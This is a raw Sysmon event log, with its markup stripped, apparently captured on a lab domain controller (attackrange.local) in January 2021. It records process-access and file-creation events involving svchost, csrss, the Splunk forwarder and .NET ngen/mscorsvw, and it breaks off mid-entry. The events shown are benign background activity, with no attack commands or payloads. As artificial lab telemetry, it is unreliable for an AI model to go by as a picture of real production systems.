13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:49.899{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:51.695{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:51.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923B-6005-2804-00000000A301}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:51.477{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923B-6005-2804-00000000A301}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:51.477{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923B-6005-2804-00000000A301}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:51.383{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d58-0\System.Data.Services.Client.dll2021-01-18 13:50:51.383 10341000x80000000000000008463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:52.273{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.258{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:52.258{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:52.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923C-6005-2A04-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.180{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-923C-6005-2A04-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:52.180{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923C-6005-2A04-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:52.117{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\468-0\System.Data.Services.Design.dll2021-01-18 13:50:52.117 10341000x80000000000000008470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:53.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:53.695{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYST